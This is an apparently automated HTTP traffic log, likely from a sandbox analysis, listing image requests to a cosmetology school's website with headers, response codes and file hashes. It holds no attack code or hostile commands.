Sha256: 7853aaf8099d3131138a4747628617d45b25c7e959bf57819db2397276bdd90f
                                        
                                            GET /templates/shahnaz/images/contact-bg.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 409 Conflict
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 83
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   83
Md5:    26267cd8990f15d3bbea71684a6d5995
Sha1:   ac3b38cf3fe0e112bb6aeb7e05226b7133575d93
Sha256: 769e8ab745a0fe4bf811036e75a8630e38c50a18cb3e24d539ce4a0722c7c85e
                                        
                                            GET /templates/shahnaz/images/main-bg.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 25785
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   25785
Md5:    bda65c9d0fbaec9733287880f834fef1
Sha1:   ce309c770811fe51a25b8714b904ac38d93dc609
Sha256: 90da5001d864d1cba02f578f18909057a1aca8e49d87fbc2d2f3bd4e026139b9
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/hairdressing.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/aesthetic.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/pctia.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
GET /vyhcz/wpuiz/rfwlz/vycez/images/applynow.jpg HTTP/1.1
Host: neetyscosmetologyschool.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
GET /vyhcz/wpuiz/rfwlz/vycez/images/advanced-aesthetic.jpg HTTP/1.1
Host: neetyscosmetologyschool.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
GET /vyhcz/wpuiz/rfwlz/vycez/images/bottom-logo.jpg HTTP/1.1
Host: neetyscosmetologyschool.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:39 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
GET /vyhcz/wpuiz/rfwlz/vycez/images/banner1.jpg HTTP/1.1
Host: neetyscosmetologyschool.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---